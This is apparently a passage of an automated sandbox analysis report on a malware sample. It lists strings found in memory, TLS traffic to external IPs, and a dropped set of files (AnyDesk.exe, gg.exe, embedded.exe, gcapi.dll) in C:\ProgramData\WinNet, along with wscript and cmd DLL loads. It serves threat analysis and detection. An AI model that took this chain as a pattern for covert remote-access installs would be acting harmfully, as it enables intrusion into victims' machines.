                                Source: gg.exe, 0000000E.00000002.1805798526.0000000002BD1000.00000004.00000800.00020000.00000000.sdmp, gg.exe, 00000012.00000002.1807448246.00000000032BC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id17Response
                                Source: gg.exe, 0000000E.00000002.1805798526.0000000002EEC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id17ResponseD
                                Source: gg.exe, 0000000E.00000002.1805798526.0000000002BD1000.00000004.00000800.00020000.00000000.sdmp, gg.exe, 00000012.00000002.1807448246.00000000032BC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id18
                                Source: gg.exe, 0000000E.00000002.1805798526.0000000002C65000.00000004.00000800.00020000.00000000.sdmp, gg.exe, 0000000E.00000002.1805798526.0000000002BD1000.00000004.00000800.00020000.00000000.sdmp, gg.exe, 00000012.00000002.1807448246.00000000032BC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id18Response
                                Source: gg.exe, 0000000E.00000002.1805798526.0000000002EEC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id18ResponseD
                                Source: gg.exe, 0000000E.00000002.1805798526.0000000002BD1000.00000004.00000800.00020000.00000000.sdmp, gg.exe, 00000012.00000002.1807448246.00000000032BC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id19
                                Source: gg.exe, 0000000E.00000002.1805798526.0000000002BD1000.00000004.00000800.00020000.00000000.sdmp, gg.exe, 00000012.00000002.1807448246.00000000032BC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id19Response
                                Source: gg.exe, 0000000E.00000002.1805798526.0000000002EEC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id19ResponseD
                                Source: gg.exe, 0000000E.00000002.1805798526.0000000002BD1000.00000004.00000800.00020000.00000000.sdmp, gg.exe, 00000012.00000002.1807448246.00000000032BC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id1Response
                                Source: gg.exe, 0000000E.00000002.1805798526.0000000002C65000.00000004.00000800.00020000.00000000.sdmp, gg.exe, 00000012.00000002.1807448246.0000000003345000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id1ResponseD
                                Source: gg.exe, 0000000E.00000002.1805798526.0000000002BD1000.00000004.00000800.00020000.00000000.sdmp, gg.exe, 00000012.00000002.1807448246.00000000032BC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id2
                                Source: gg.exe, 0000000E.00000002.1805798526.0000000002BD1000.00000004.00000800.00020000.00000000.sdmp, gg.exe, 00000012.00000002.1807448246.00000000032BC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id20
                                Source: gg.exe, 0000000E.00000002.1805798526.0000000002BD1000.00000004.00000800.00020000.00000000.sdmp, gg.exe, 00000012.00000002.1807448246.00000000032BC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id20Response
                                Source: gg.exe, 0000000E.00000002.1805798526.0000000002C65000.00000004.00000800.00020000.00000000.sdmp, gg.exe, 00000012.00000002.1807448246.0000000003634000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id20ResponseD
                                Source: gg.exe, 0000000E.00000002.1805798526.0000000002BD1000.00000004.00000800.00020000.00000000.sdmp, gg.exe, 00000012.00000002.1807448246.00000000032BC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id21
                                Source: gg.exe, 0000000E.00000002.1805798526.0000000002BD1000.00000004.00000800.00020000.00000000.sdmp, gg.exe, 00000012.00000002.1807448246.00000000032BC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id21Response
                                Source: gg.exe, 0000000E.00000002.1805798526.0000000002CC9000.00000004.00000800.00020000.00000000.sdmp, gg.exe, 00000012.00000002.1807448246.000000000353B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id21ResponseD
                                Source: gg.exe, 0000000E.00000002.1805798526.0000000002BD1000.00000004.00000800.00020000.00000000.sdmp, gg.exe, 0000000E.00000002.1805798526.0000000002F4D000.00000004.00000800.00020000.00000000.sdmp, gg.exe, 00000012.00000002.1807448246.0000000003605000.00000004.00000800.00020000.00000000.sdmp, gg.exe, 00000012.00000002.1807448246.00000000032BC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id22
                                Source: gg.exe, 0000000E.00000002.1805798526.0000000002C65000.00000004.00000800.00020000.00000000.sdmp, gg.exe, 0000000E.00000002.1805798526.0000000002BD1000.00000004.00000800.00020000.00000000.sdmp, gg.exe, 00000012.00000002.1807448246.0000000003345000.00000004.00000800.00020000.00000000.sdmp, gg.exe, 00000012.00000002.1807448246.00000000032BC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id22Response
                                Source: gg.exe, 0000000E.00000002.1805798526.0000000002FD3000.00000004.00000800.00020000.00000000.sdmp, gg.exe, 00000012.00000002.1807448246.00000000036B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id22ResponseD
                                Source: gg.exe, 0000000E.00000002.1805798526.0000000002C65000.00000004.00000800.00020000.00000000.sdmp, gg.exe, 0000000E.00000002.1805798526.0000000002BD1000.00000004.00000800.00020000.00000000.sdmp, gg.exe, 00000012.00000002.1807448246.0000000003596000.00000004.00000800.00020000.00000000.sdmp, gg.exe, 00000012.00000002.1807448246.00000000032BC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id23
                                Source: gg.exe, 0000000E.00000002.1805798526.0000000002C65000.00000004.00000800.00020000.00000000.sdmp, gg.exe, 0000000E.00000002.1805798526.0000000002BD1000.00000004.00000800.00020000.00000000.sdmp, gg.exe, 0000000E.00000002.1805798526.0000000002FD3000.00000004.00000800.00020000.00000000.sdmp, gg.exe, 00000012.00000002.1807448246.0000000003345000.00000004.00000800.00020000.00000000.sdmp, gg.exe, 00000012.00000002.1807448246.00000000032BC000.00000004.00000800.00020000.00000000.sdmp, gg.exe, 00000012.00000002.1807448246.0000000003634000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id23Response
                                Source: gg.exe, 0000000E.00000002.1805798526.0000000002FD3000.00000004.00000800.00020000.00000000.sdmp, gg.exe, 00000012.00000002.1807448246.00000000036B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id23ResponseD
                                Source: gg.exe, 0000000E.00000002.1805798526.0000000002BD1000.00000004.00000800.00020000.00000000.sdmp, gg.exe, 00000012.00000002.1807448246.00000000032BC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id24
                                Source: gg.exe, 0000000E.00000002.1805798526.0000000002BD1000.00000004.00000800.00020000.00000000.sdmp, gg.exe, 00000012.00000002.1807448246.00000000032BC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id24Response
                                Source: gg.exe, 0000000E.00000002.1805798526.0000000002BD1000.00000004.00000800.00020000.00000000.sdmp, gg.exe, 00000012.00000002.1807448246.00000000032BC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id2Response
                                Source: gg.exe, 0000000E.00000002.1805798526.0000000002C65000.00000004.00000800.00020000.00000000.sdmp, gg.exe, 00000012.00000002.1807448246.0000000003345000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id2ResponseD
                                Source: gg.exe, 0000000E.00000002.1805798526.0000000002BD1000.00000004.00000800.00020000.00000000.sdmp, gg.exe, 00000012.00000002.1807448246.00000000032BC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id3
                                Source: gg.exe, 0000000E.00000002.1805798526.0000000002BD1000.00000004.00000800.00020000.00000000.sdmp, gg.exe, 00000012.00000002.1807448246.00000000032BC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id3Response
                                Source: gg.exe, 0000000E.00000002.1805798526.0000000002BD1000.00000004.00000800.00020000.00000000.sdmp, gg.exe, 00000012.00000002.1807448246.00000000032BC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id4
                                Source: gg.exe, 0000000E.00000002.1805798526.0000000002BD1000.00000004.00000800.00020000.00000000.sdmp, gg.exe, 00000012.00000002.1807448246.00000000032BC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id4Response
                                Source: gg.exe, 0000000E.00000002.1805798526.0000000002C65000.00000004.00000800.00020000.00000000.sdmp, gg.exe, 00000012.00000002.1807448246.0000000003345000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id4ResponseD
                                Source: gg.exe, 0000000E.00000002.1805798526.0000000002BD1000.00000004.00000800.00020000.00000000.sdmp, gg.exe, 00000012.00000002.1807448246.00000000032BC000.00000004.00000800.00020000.00000000.sdmp, gg.exe, 00000012.00000002.1821468042.0000000004436000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id5
                                Source: gg.exe, 0000000E.00000002.1805798526.0000000002BD1000.00000004.00000800.00020000.00000000.sdmp, gg.exe, 00000012.00000002.1807448246.00000000032BC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id5Response
                                Source: gg.exe, 0000000E.00000002.1805798526.0000000002C65000.00000004.00000800.00020000.00000000.sdmp, gg.exe, 00000012.00000002.1807448246.000000000353B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id5ResponseD
                                Source: gg.exe, 0000000E.00000002.1805798526.0000000002BD1000.00000004.00000800.00020000.00000000.sdmp, gg.exe, 00000012.00000002.1807448246.00000000032BC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id6
                                Source: gg.exe, 0000000E.00000002.1805798526.0000000002BD1000.00000004.00000800.00020000.00000000.sdmp, gg.exe, 00000012.00000002.1807448246.00000000032BC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id6Response
                                Source: gg.exe, 0000000E.00000002.1805798526.0000000002C65000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id6ResponseD
                                Source: gg.exe, 0000000E.00000002.1805798526.0000000002BD1000.00000004.00000800.00020000.00000000.sdmp, gg.exe, 00000012.00000002.1807448246.00000000032BC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id7
                                Source: gg.exe, 0000000E.00000002.1805798526.0000000002BD1000.00000004.00000800.00020000.00000000.sdmp, gg.exe, 00000012.00000002.1807448246.00000000032BC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id7Response
                                Source: gg.exe, 0000000E.00000002.1805798526.0000000002EEC000.00000004.00000800.00020000.00000000.sdmp, gg.exe, 00000012.00000002.1807448246.000000000353B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id7ResponseD
                                Source: gg.exe, 0000000E.00000002.1805798526.0000000002BD1000.00000004.00000800.00020000.00000000.sdmp, gg.exe, 00000012.00000002.1807448246.00000000032BC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id8
                                Source: gg.exe, 0000000E.00000002.1805798526.0000000002BD1000.00000004.00000800.00020000.00000000.sdmp, gg.exe, 00000012.00000002.1807448246.00000000032BC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id8Response
                                Source: gg.exe, 0000000E.00000002.1805798526.0000000002EEC000.00000004.00000800.00020000.00000000.sdmp, gg.exe, 00000012.00000002.1807448246.000000000353B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id8ResponseD
                                Source: gg.exe, 0000000E.00000002.1805798526.0000000002BD1000.00000004.00000800.00020000.00000000.sdmp, gg.exe, 00000012.00000002.1807448246.00000000032BC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id9
                                Source: gg.exe, 0000000E.00000002.1805798526.0000000002BD1000.00000004.00000800.00020000.00000000.sdmp, gg.exe, 00000012.00000002.1807448246.0000000003345000.00000004.00000800.00020000.00000000.sdmp, gg.exe, 00000012.00000002.1807448246.00000000032BC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id9Response
                                Source: gg.exe, 0000000E.00000002.1805798526.0000000002FC0000.00000004.00000800.00020000.00000000.sdmp, gg.exe, 00000012.00000002.1807448246.000000000360D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id9ResponseD
                                Source: AnyDesk.exe, 00000010.00000002.2893264351.0000000006E60000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.exe, 00000010.00000002.2891388326.00000000047A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.gimp.org/xmp/
                                Source: AnyDesk.exe, 00000010.00000003.1654541625.00000000029B0000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.exe, 00000010.00000002.2884055986.0000000000C79000.00000002.00000001.01000000.00000008.sdmpString found in binary or memory: http://www.opengl.org/registry/
                                Source: AnyDesk.exe, 00000010.00000002.2884055986.0000000000C79000.00000002.00000001.01000000.00000008.sdmpString found in binary or memory: http://www.openssl.org/)
                                Source: AnyDesk.exe, 00000010.00000003.1654541625.00000000029B0000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.exe, 00000010.00000002.2884055986.0000000000C79000.00000002.00000001.01000000.00000008.sdmpString found in binary or memory: http://www.openssl.org/support/faq.html
                                Source: AnyDesk.exe, 00000010.00000003.1654541625.00000000029B0000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.exe, 00000010.00000002.2884055986.0000000000C79000.00000002.00000001.01000000.00000008.sdmpString found in binary or memory: http://www.openssl.org/support/faq.htmlEC_PRIVATEKEYpublicKeyparametersprivateKeyECPKPARAMETERSvalue
                                Source: gg.exe, 0000000E.00000002.1811038264.0000000003F5E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                                Source: AnyDesk.exe, 00000010.00000003.1654541625.00000000029B0000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.exe, 00000010.00000002.2884055986.0000000000C79000.00000002.00000001.01000000.00000008.sdmpString found in binary or memory: https://anydesk.com
                                Source: AnyDesk.exe, 00000010.00000003.1663509478.000000000404F000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.exe, 00000010.00000003.1663596994.0000000004062000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.exe, 00000010.00000002.2891142994.00000000043E0000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.exe, 00000010.00000003.1663258383.0000000004088000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://anydesk.com/
                                Source: AnyDesk.exe, 00000010.00000003.1664717237.000000000400B000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.exe, 00000010.00000003.1654541625.00000000029B0000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.exe, 00000010.00000002.2884055986.0000000000C79000.00000002.00000001.01000000.00000008.sdmpString found in binary or memory: https://anydesk.com/company#imprint
                                Source: AnyDesk.exe, 00000010.00000003.1664717237.000000000400B000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.exe, 00000010.00000003.1654541625.00000000029B0000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.exe, 00000010.00000002.2884055986.0000000000C79000.00000002.00000001.01000000.00000008.sdmpString found in binary or memory: https://anydesk.com/contact/sales
                                Source: AnyDesk.exe, 00000010.00000003.1663509478.000000000404F000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.exe, 00000010.00000002.2891142994.00000000043E0000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.exe, 00000010.00000003.1663258383.0000000004088000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://anydesk.com/contact/sales)
                                Source: AnyDesk.exe, 00000010.00000002.2884055986.0000000000C79000.00000002.00000001.01000000.00000008.sdmpString found in binary or memory: https://anydesk.com/de/datenschutz
                                Source: AnyDesk.exe, 00000010.00000003.1654541625.00000000029B0000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.exe, 00000010.00000002.2884055986.0000000000C79000.00000002.00000001.01000000.00000008.sdmpString found in binary or memory: https://anydesk.com/en/assembly
                                Source: AnyDesk.exe, 00000010.00000003.1654541625.00000000029B0000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.exe, 00000010.00000002.2884055986.0000000000C79000.00000002.00000001.01000000.00000008.sdmpString found in binary or memory: https://anydesk.com/en/assembly/terms
                                Source: AnyDesk.exe, 00000010.00000003.1664717237.000000000400B000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.exe, 00000010.00000003.1654541625.00000000029B0000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.exe, 00000010.00000002.2884055986.0000000000C79000.00000002.00000001.01000000.00000008.sdmpString found in binary or memory: https://anydesk.com/en/changelog/windows
                                Source: AnyDesk.exe, 00000010.00000002.2884055986.0000000000C79000.00000002.00000001.01000000.00000008.sdmpString found in binary or memory: https://anydesk.com/en/privacy
                                Source: AnyDesk.exe, 00000010.00000002.2884055986.0000000000C79000.00000002.00000001.01000000.00000008.sdmpString found in binary or memory: https://anydesk.com/es/privacidad
                                Source: AnyDesk.exe, 00000010.00000002.2884055986.0000000000C79000.00000002.00000001.01000000.00000008.sdmpString found in binary or memory: https://anydesk.com/order
                                Source: AnyDesk.exe, 00000010.00000003.1664717237.000000000400B000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.exe, 00000010.00000003.1654541625.00000000029B0000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.exe, 00000010.00000002.2884055986.0000000000C79000.00000002.00000001.01000000.00000008.sdmpString found in binary or memory: https://anydesk.com/pricing/teams
                                Source: AnyDesk.exe, 00000010.00000002.2891142994.00000000043E0000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.exe, 00000010.00000003.1663258383.0000000004088000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://anydesk.com/pricing/teams)
                                Source: unknown Network traffic detected: HTTP traffic on port 49733 -> 443
                                Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49733
                                Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49731
                                Source: unknown Network traffic detected: HTTP traffic on port 49731 -> 443
                                Source: unknown HTTPS traffic detected: 185.229.191.44:443 -> 192.168.2.4:49731 version: TLS 1.2
                                Source: unknown HTTPS traffic detected: 64.31.23.26:443 -> 192.168.2.4:49733 version: TLS 1.2
                                Source: AnyDesk.exe, 00000010.00000003.1654541625.00000000029B0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: DirectDrawCreateEx memstr_e8dd2a33-3
                                Source: AnyDesk.exe, 00000010.00000003.1654541625.00000000029B0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: GetRawInputData memstr_3943cece-8

                                System Summary

                                Source: C:\Windows\System32\wscript.exe COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
                                Source: C:\ProgramData\WinNet\AnyDesk.exe Code function: 19_2_69C3B6C0 new, SetHandleInformation, CreateEnvironmentBlock, CreateProcessAsUserW, DestroyEnvironmentBlock, CreateProcessW, AssignProcessToJobObject, GetCurrentProcess, GetCurrentProcess, TerminateProcess, GetCurrentProcess, WaitForSingleObject, ResumeThread, WaitForSingleObject
                                Source: Joe Sandbox View Dropped File: C:\ProgramData\WinNet\gcapi.dll 73170761D6776C0DEBACFBBC61B6988CB8270A20174BF5C049768A264BB8FFAF
                                Source: C:\ProgramData\WinNet\AnyDesk.exe Code function: String function: 69C22EA0 appears 47 times
                                Source: C:\ProgramData\WinNet\AnyDesk.exe Code function: String function: 69C22340 appears 31 times
                                Source: C:\ProgramData\WinNet\AnyDesk.exe Code function: String function: 69C26EC0 appears 51 times
                                Source: C:\ProgramData\WinNet\AnyDesk.exe Code function: String function: 69C3FC11 appears 50 times
                                Source: C:\ProgramData\WinNet\AnyDesk.exe Code function: String function: 69C41630 appears 48 times
                                Source: AnyDesk.exe.7.dr Static PE information: No import functions for PE file found
                                Source: SysrI6zSkJ.exe, 00000000.00000002.2883966376.00000231D8F41000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameAstutest.exe8 vs SysrI6zSkJ.exe
                                Source: C:\Users\user\Desktop\SysrI6zSkJ.exe Section loaded: apphelp.dll
                                Source: C:\Users\user\Desktop\SysrI6zSkJ.exe Section loaded: iphlpapi.dll
                                Source: C:\Users\user\Desktop\SysrI6zSkJ.exe Section loaded: dbghelp.dll
                                Source: C:\Users\user\Desktop\SysrI6zSkJ.exe Section loaded: kernel.appcore.dll
                                Source: C:\Windows\System32\cmd.exe Section loaded: apphelp.dll
                                Source: C:\Windows\System32\cmd.exe Section loaded: cmdext.dll
                                Source: C:\Windows\System32\cmd.exe Section loaded: windows.storage.dll
                                Source: C:\Windows\System32\cmd.exe Section loaded: wldp.dll
                                Source: C:\Windows\System32\cmd.exe Section loaded: kernel.appcore.dll
                                Source: C:\Windows\System32\cmd.exe Section loaded: uxtheme.dll
                                Source: C:\Windows\System32\cmd.exe Section loaded: propsys.dll
                                Source: C:\Windows\System32\cmd.exe Section loaded: profapi.dll
                                Source: C:\Windows\System32\cmd.exe Section loaded: edputil.dll
                                Source: C:\Windows\System32\cmd.exe Section loaded: urlmon.dll
                                Source: C:\Windows\System32\cmd.exe Section loaded: iertutil.dll
                                Source: C:\Windows\System32\cmd.exe Section loaded: srvcli.dll
                                Source: C:\Windows\System32\cmd.exe Section loaded: netutils.dll
                                Source: C:\Windows\System32\cmd.exe Section loaded: windows.staterepositoryps.dll
                                Source: C:\Windows\System32\cmd.exeSection loaded: policymanager.dllJump to behavior
                                Source: C:\Windows\System32\cmd.exeSection loaded: msvcp110_win.dllJump to behavior
                                Source: C:\Windows\System32\cmd.exeSection loaded: sspicli.dllJump to behavior
                                Source: C:\Windows\System32\cmd.exeSection loaded: wintypes.dllJump to behavior
                                Source: C:\Windows\System32\cmd.exeSection loaded: appresolver.dllJump to behavior
                                Source: C:\Windows\System32\cmd.exeSection loaded: bcp47langs.dllJump to behavior
                                Source: C:\Windows\System32\cmd.exeSection loaded: slc.dllJump to behavior
                                Source: C:\Windows\System32\cmd.exeSection loaded: userenv.dllJump to behavior
                                Source: C:\Windows\System32\cmd.exeSection loaded: sppc.dllJump to behavior
                                Source: C:\Windows\System32\cmd.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                                Source: C:\Windows\System32\cmd.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                                Source: C:\Windows\System32\cmd.exeSection loaded: pcacli.dllJump to behavior
                                Source: C:\Windows\System32\cmd.exeSection loaded: mpr.dllJump to behavior
                                Source: C:\Windows\System32\cmd.exeSection loaded: sfc_os.dllJump to behavior
                                Source: C:\ProgramData\WinNet\embedded.exeSection loaded: apphelp.dllJump to behavior
                                Source: C:\ProgramData\WinNet\embedded.exeSection loaded: iphlpapi.dllJump to behavior
                                Source: C:\ProgramData\WinNet\embedded.exeSection loaded: dbghelp.dllJump to behavior
                                Source: C:\ProgramData\WinNet\embedded.exeSection loaded: kernel.appcore.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: apphelp.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: dlnashext.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: wpdshext.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                                Source: C:\Windows\System32\cmd.exeSection loaded: apphelp.dllJump to behavior
                                Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dll
                                Source: C:\Windows\System32\cmd.exeSection loaded: windows.storage.dll
                                Source: C:\Windows\System32\cmd.exeSection loaded: wldp.dll
                                Source: C:\Windows\System32\cmd.exeSection loaded: kernel.appcore.dll
                                Source: C:\Windows\System32\cmd.exeSection loaded: uxtheme.dll
                                Source: C:\Windows\System32\cmd.exeSection loaded: propsys.dll
                                Source: C:\Windows\System32\cmd.exeSection loaded: profapi.dll
                                Source: C:\Windows\System32\cmd.exeSection loaded: edputil.dll
                                Source: C:\Windows\System32\cmd.exeSection loaded: urlmon.dll
                                Source: C:\Windows\System32\cmd.exeSection loaded: iertutil.dll
                                Source: C:\Windows\System32\cmd.exeSection loaded: srvcli.dll
                                Source: C:\Windows\System32\cmd.exeSection loaded: netutils.dll
                                Source: C:\Windows\System32\cmd.exeSection loaded: windows.staterepositoryps.dll
                                Source: C:\Windows\System32\cmd.exeSection loaded: policymanager.dll
                                Source: C:\Windows\System32\cmd.exeSection loaded: msvcp110_win.dll
                                Source: C:\Windows\System32\cmd.exeSection loaded: sspicli.dll
                                Source: C:\Windows\System32\cmd.exeSection loaded: wintypes.dll
                                Source: C:\Windows\System32\cmd.exeSection loaded: appresolver.dll
                                Source: C:\Windows\System32\cmd.exeSection loaded: bcp47langs.dll
                                Source: C:\Windows\System32\cmd.exeSection loaded: slc.dll
                                Source: C:\Windows\System32\cmd.exeSection loaded: userenv.dll
                                Source: C:\Windows\System32\cmd.exeSection loaded: sppc.dll
                                Source: C:\Windows\System32\cmd.exeSection loaded: onecorecommonproxystub.dll
                                Source: C:\Windows\System32\cmd.exeSection loaded: onecoreuapcommonproxystub.dll
                                Source: C:\Windows\System32\cmd.exeSection loaded: pcacli.dll
                                Source: C:\Windows\System32\cmd.exeSection loaded: mpr.dll
                                Source: C:\Windows\System32\cmd.exeSection loaded: sfc_os.dll
                                Source: C:\ProgramData\WinNet\gg.exeSection loaded: mscoree.dllJump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeSection loaded: apphelp.dllJump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeSection loaded: kernel.appcore.dllJump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeSection loaded: version.dllJump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeSection loaded: uxtheme.dllJump to behavior
